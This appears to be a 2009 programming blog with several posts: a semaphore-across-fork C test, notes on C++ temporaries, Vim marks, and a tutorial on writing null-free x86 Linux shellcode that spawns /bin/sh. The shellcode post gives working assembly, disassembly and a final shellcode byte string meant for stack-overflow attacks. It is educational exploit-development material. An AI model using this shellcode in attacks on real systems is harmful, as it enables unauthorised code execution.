#include <sys/stat.h>
#include <fcntl.h>

int main()
{
 switch(fork())
 {
 case -1:
  perror("fork()");

  return 1;

 case 0:
 {
  sem_t *sem = sem_open("key",O_CREAT,S_IRUSR|S_IWUSR,0);

  printf("Child %u waiting for semaphore(%p)...\n",getpid(),sem);
  sem_wait(sem);
  printf("Child: Done\n");
  
  return 0;
 }
 }

 sleep(1);

 sem_t *sem = sem_open("key",O_CREAT,S_IRUSR|S_IWUSR,0);

 printf("Parent %u setting semaphore(%p)...\n",getpid(),sem);
 sem_post(sem);
 printf("Parent: Set\n");

 return 0;

}
$gcc sem-test.c -lrt -o test
$./test 
Child 16116 waiting for semaphore(0xb8062000)...
Parent 16115 setting semaphore(0xb8062000)...
Parent: Set
Child: Done
That is because memory mapped by mmap is preserved across fork, with the same set of attributes.

Tuesday, March 3, 2009

c++: lifetime of temporaries

In c++ you can encounter few types of temporary objects.

Implicitly temporary object is created by compiler when complex expression is being evaluated:

5 + a/4;
Here the result of expression of (a/4) has to be stored somewhere for further calculations.

An anonymous temporary object could be created by programmer when no name is given to an object. Such expression as
4;
is an anonymous temporary object of type int.
When function is intend to return some value it would be also stored into the temporary object.

Of course smart compilers will make some optimizations here to avoid the creation of temporary objects.
The expression
int b = 5 + a/4
could be optimized as storing the result of a/4 to b then adding 5 to b.
The unused return value of the function won't be stored anywhere, moreover compiler may force function not to perform any 'return' actions.

The lifetime of temporary object is ended at the last step in evaluating the full-expression(or block of code) that contains the point where they were created. The temporary object of a/4 in expression 5 + a/4; is being destroyed just after the semicolon.

There is an exception in the standard when you can extend the lifetime of temporary object to the lifetime of const reference that is binded to it:
string get()
{
    return "string";
}
const string &obj = get();
The lifetime of string object created by function get on return is extended to the lifetime of const reference obj.

The temporaries are r-value objects, which means that you can't change their values. So the usage of const reference is mandatory. In pre-standard it's was allowed to use non-const references for temporaries but in ISO-C++ it's a compilation error. Changing value of const object could lead to unexpected results.

Using const references to catch the return value of the function could be used as an optimization of avoiding creating temporary object on function return. Consider this code:
string get()
{
    return "string";
}
string obj = get();
The temporary is created and its value is stored into the string object obj. Binding the return value to const reference could optimize memory usage and avoid extra calls to constructor and destructor in case if you are interested in the result of the function.

However modern compilers use RVO(Return Value Optimization) or NRVO(Named RVO) to avoid creation of temporary objects so in most cases you don't have to care about such optimizations.

Thursday, February 26, 2009

asm: writing shellcode/getting rid of data section and nulls

Most probably you want your shellcode to execute "/bin/sh" on target box. Here you have to deal somehow with string, which in normal programs is stored in data section.

The problem you may face when you are writing a shellcode is that you can't just use data section in your shellode - your shellcode and target application use different data sections.

First of all I've tried to use call instruction. When processor executes call it automatically puts address of the next instruction into esp register. We can use this "feature" keeping in mind that call works with addresses, that means that we can use address of instruction rather than function's.
Let's look at the code below

1 
 2 .global main
 3 
 4 main:
 5     jmp     two
 6 one:
 7     movl    (%esp), %ebx
 8     xor     %eax, %eax 
 9     
10     pushl   %eax
11     pushl   %ebx
12     movl    %esp, %ecx
13     
14     xorl    %edx, %edx
15     
16     movl    $11, %eax 
17     int     $0x80
18 two:
19     call    one
20     .string "/bin/sh"
Just in the beginning processor jumps to label two. Then it executes call: puts address of the next instruction and jumps to label one. Here is the most interesting part. The address of the "next instruction" after the "call one" is our string.
So when we are already in label one we have address of the string "/bin/sh" in esp.
Then the code prepares registers for system call execve. Number of syscall execve(11) to eax, path to executable to ebx, argv array to ecx and envp array to edx. argv array I simulated with pushing values to stack and putting address of the top of the stack to ebx, I don't push any environment variables, so %edx is null.

This code is valid and will execute /bin/sh if you compile it and execute.
(~~) gcc test.s -o test 
(~~) ./test 
sh-3.2#
The problem here is that it contains nulls:
080483b4 <main>:
 80483b4: eb 12                 jmp    80483c8 <two>

080483b6 <one>:
 80483b6: 8b 1c 24              mov    (%esp),%ebx
 80483b9: 31 c0                 xor    %eax,%eax
 80483bb: 50                    push   %eax
 80483bc: 53                    push   %ebx
 80483bd: 89 e1                 mov    %esp,%ecx
 80483bf: 31 d2                 xor    %edx,%edx
 80483c1: b8 0b 00 00 00        mov    $0xb,%eax
 80483c6: cd 80                 int    $0x80

080483c8 <two>:
 80483c8: e8 e9 ff ff ff        call   80483b6 <one>
 80483cd: 2f                    das    
 80483ce: 62 69 6e              bound  %ebp,0x6e(%ecx)
 80483d1: 2f                    das    
 80483d2: 73 68                 jae    804843c <__libc_csu_init+0x4c>
 80483d4: 00 90 90 90 90 90     add    %dl,-0x6f6f6f70(%eax)
 80483da: 90                    nop    
 80483db: 90                    nop    
 80483dc: 90                    nop    
 80483dd: 90                    nop    
 80483de: 90                    nop    
 80483df: 90                    nop    
Almost all stack overflow attacks uses libc string function to overwrite execution point of function or return point with the chellcode. If shellcode contains null characters it could not be read to the end and the attack will fail.
The "main" null is in our string "/bin/sh". execve doesn't work with not a null-ending strings. I tried to make the string like "/bin/shx" and define it as ascii:
.ascii  "/bin/shx"
and later in runtime override the last character with null but all the time I got segmentation violation alert. I suppose that this is because I was trying to modify read-only section. This became a dead-end for me.
I decided to try another way of defining the string. String after all is an array of bytes. So we can just put these bytes somewhere else is some other representation.
Let's look at the string "/bin/sh" from the other side.
(~~) echo -n "/bin/sh" | hexdump 
0000000 622f 6e69 732f 0068
Aligned to 4 it still contain null, but this is not a problem, we can divide it into 2-bytes chunks:
622f,6e69,732f,68
And now we can use word-long instructions. Let's look at the updated code of our shell program.
1 
 2 .global main
 3 
 4 main:
 5     xor     %eax, %eax
 6     
 7     pushl   %eax
 8     pushw   $0x68
 9     pushw   $0x732f
10     pushw   $0x6e69
11     pushw   $0x622f
12     
13     movl    %esp, %ebx
14     
15     pushl   %eax
16     pushl   %ebx
17     movl    %esp, %ecx
18     
19     xorl    %edx, %edx
20     
21     movl    $11, %eax
22     int     $0x80
I've pushed word-long chunks of the string onto the stack(at first I've pushed zeroed eax to indicate end of string) and put moved address of the head of the stack to ebx. That's almost all. If you still try to compile this code you'd probably find out some zeros. That's because of the movl $11, %eax instruction. 11 could be hold in one byte-long memory node but movl will align memory to 4 bytes with zeros. So just changing from movl to movb will remove this last zero. The latest code should be like
1 
 2 .global main
 3 
 4 main:
 5     xor     %eax, %eax
 6     
 7     pushl   %eax
 8     pushw   $0x68
 9     pushw   $0x732f
10     pushw   $0x6e69
11     pushw   $0x622f
12     
13     movl    %esp, %ebx
14     
15     pushl   %eax
16     pushl   %ebx
17     movl    %esp, %ecx
18     
19     xorl    %edx, %edx
20     
21     movb    $11, %al
22     int     $0x80
Compiling it and obtaining the machine codes I can see there is no zeros there:
080483b4 <main>
 80483b4: 31 c0                 xor    %eax,%eax
 80483b6: 50                    push   %eax
 80483b7: 66 6a 68              pushw  $0x68
 80483ba: 66 68 2f 73           pushw  $0x732f
 80483be: 66 68 69 6e           pushw  $0x6e69
 80483c2: 66 68 2f 62           pushw  $0x622f
 80483c6: 89 e3                 mov    %esp,%ebx
 80483c8: 50                    push   %eax
 80483c9: 53                    push   %ebx
 80483ca: 89 e1                 mov    %esp,%ecx
 80483cc: 31 d2                 xor    %edx,%edx
 80483ce: b0 0b                 mov    $0xb,%al
 80483d0: cd 80                 int    $0x80
The shellcode string will look like
"\x31\xc0\x50\x66\x6a\x68\x66\x68\x2f\x73\x66\x68\x69\x6e\x66"
"\x68\x2f\x62\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"

Monday, February 23, 2009

vim: navigation with marks

Each time I touch different systems I realise that ViM is really powerful editor.

Browsing long source files you likely will jump between different pieces of code inside the file.
Of course you can keep in mind the line numbers but if you insert lines the block below will be shifted and so on.

Better way to use marks. Marks is a simple mechanism to navigate through the file.

Here is the list of commands to use marks in ViM:

mx tells Vim to add a mark called x, x could be in range of [a-zA-Z]
`x tells Vim to return to the line and column for mark x
'x tells Vim to return to the beginning of the line where mark x is set
g`x tells Vim to return to the line and column for mark x but don't change the jumplist
g'x tells Vim to return to the beginning of the line where mark x is set  but don't change the jumplist
`. moves the cursor to the line and column where the last edit was made
'. moves the cursor to the line where the last edit was made
'" moves the cursor to the last position of the cursor when you exited the previous session
'' moves the cursor to the line before the latest jump
`` moves the cursor to the line and column before the latest jump
:marks shows all marks set
:jumps shows the jumplist
Ctrl-o moves the cursor to the last jump
Ctrl-i moves the cursor to the previous jump

Marks with lowercase names are valid within one file, marks with uppercase names are valid between files.

Lowercase marks are remembered as long as the file remains in the
buffer list.
Uppercase marks include the file name. It's possible to use them to jump from file to file.

Worth to mention that the line number of the mark remains correct, even if you insert/delete lines or edit another file for a moment.

Marks could be used with common ViM operations: d, y, etc.
For example y'x tells ViM to copy text between current position and mark x into the buffer.

Special marks ' and ` could be used as lowercase marks - you can set their position.

There are a lot of other special marks, which description you can find in ViM manual.